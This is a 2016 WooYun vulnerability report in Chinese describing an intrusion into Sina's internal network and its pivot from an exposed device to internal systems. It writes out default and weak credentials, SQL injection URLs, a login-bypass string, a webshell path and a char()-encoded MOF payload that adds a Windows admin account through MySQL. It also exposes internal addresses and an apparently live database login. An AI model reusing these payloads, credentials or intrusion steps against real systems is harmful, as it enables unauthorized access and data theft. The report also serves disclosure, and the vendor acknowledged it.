当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0196483

漏洞标题:对新浪的一次渗透测试

相关厂商:新浪

漏洞作者: if、so

提交时间:2016-04-15 09:12

修复时间:2016-05-30 15:10

公开时间:2016-05-30 15:10

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-15: 细节已通知厂商并且等待厂商处理中
2016-04-15: 厂商已经确认,细节仅向厂商公开
2016-04-25: 细节向核心白帽子及相关领域专家公开
2016-05-05: 细节向普通白帽子公开
2016-05-15: 细节向实习白帽子公开
2016-05-30: 细节向公众公开

简要描述:

@sky,终于进入新浪内网

详细说明:

想漫游新浪好久了。下班回家打开电脑,继续苦逼的尝试
看了一圈没有什么发现
继续把注意力放在staff.sina.com.cn这个域名
之前看过好多次,没什么问题,但是不代表一直没有问题
dialin.staff.sina.com.cn 这是一个外网的员工登陆口,爆破尝试失败
c段发现一处网络设备,是以前没有发现的,218.30.113.65

1111.png


basic 认证,设备名是arg,尝试弱口令 arg admin成功登陆

1111.png


发现ping功能,尝试ping内网邮件服务器

1111.png


找了sky看了下,发现ping处存在命令执行

1111.png


反弹shell

1111.png


由于是root权限,而且这台机器拥有公网ip

eth0      Link encap:Ethernet  HWaddr 00:30:18:c6:38:99  
          inet addr:218.30.113.65  Bcast:218.30.113.127  Mask:255.255.255.192
          inet6 addr: fe80::230:18ff:fec6:3899/64 Scope:Link
          UP BROADCAST RUNNING  MTU:1500  Metric:1
          RX packets:3979542 errors:0 dropped:0 overruns:0 frame:0
          TX packets:97531 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:5414089145 (5.4 GB)  TX bytes:15440995 (15.4 MB)
          Memory:f7c00000-f7c1ffff


为了后续能方便快速的渗透,所以决定在这台机器上搭建pptp vpn作为跳板
成功搭建pptp vpn,简直是方便安全快速,远比新浪公司的方便,不要手机短信,不要token~

1111.png


1111.png


但是后来发现并不能和内网机器通讯

1111.png


想到可能做了隔离,发现机器所处c段可以访问

1111.png


开始尝试获取c段机器的权限
发现c段是新浪电视直播的生产环境

1111.png


存在大量漏洞
https://10.219.18.106/login.html dell openmanager
默认口令 root calvin

1111.png


https://10.219.18.101/designs/imm/index.php
默认用户名:USERID
默认密码:PASSW0RD

1111.png


注入漏洞

http://10.219.18.61/edit.php?input_id=5%27%20and%20%271%27=%272


POST /index.php HTTP/1.1
Host: 10.219.18.63
Proxy-Connection: keep-alive
Content-Length: 21
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://10.219.18.63
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://10.219.18.63/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=tvocg2n5k6dlqf6v3jj8otr4u0
username=1&password=1


sqllite注入

1111.png


getshell

http://10.219.18.63/index.php

存在万能密码admin' or '1'='1
登入后台

1111.png


上传php webshell

http://10.219.18.62/watermark/c11.php

cmd

1111.png


发现此台机器与核心内网相连

1111.png


1111.png


畅通无阻
使用http代理访问

1111.png


1111.png


1111.png


终于见到了想见好久的新浪内网exchange邮件服务器
但是,问题来了,通过http代理问题比较多,速度,稳定性,会话超时等等,所以需要一个更稳定的控制端来对内网进行渗透
所以要在c段渗透下一台windows机器
扫了下端口

1111.png


这些肯定是windows机器了
其中10.219.18.8还开启了mysql服务

1111.png


并且存在root root弱口令
并且10.219.18.8还是一台windows 2003的机器

1111.png


正好可以利用MOF来获取系统权限
转码导出文件到c:/windows/system32/wbem/mof/下面

select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';


等待几秒,成功进入3389

1111.png


pass.jpg


发现一个密码通杀,登陆多台机器

tv1.jpg


1111.png


1111.png


发现和核心内网相连!

1111.png


1111.png


1111.png


并且处于新浪内网核心staff域中

C:\Documents and Settings\admin>net view /domain
Domain
-------------------------------------------------------------------------------
STAFF
WORKGROUP
命令成功完成。
C:\Documents and Settings\admin>


天时地利人和,稳定的外网跳板,方便的内网操作环境,花上一点时间,内网渗透会很精彩
随便在github上找点密码都能连上,内网邮箱弱口令还会少吗?

192.168.145.117 1433 zhuku zhiku@sina


1111.png


漏洞证明:

如上所示,搞太久了,接近10个小时了,后续也比较简单,鉴于关键系统有多重验证,可以把注意力放在域渗透上。没有力气往下继续深入了也感谢sky大半夜和我一起撸站

修复方案:

版权声明:转载请注明来源 if、so@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-04-15 15:00

厂商回复:

感谢关注新浪安全,问题修复中。

最新状态:

暂无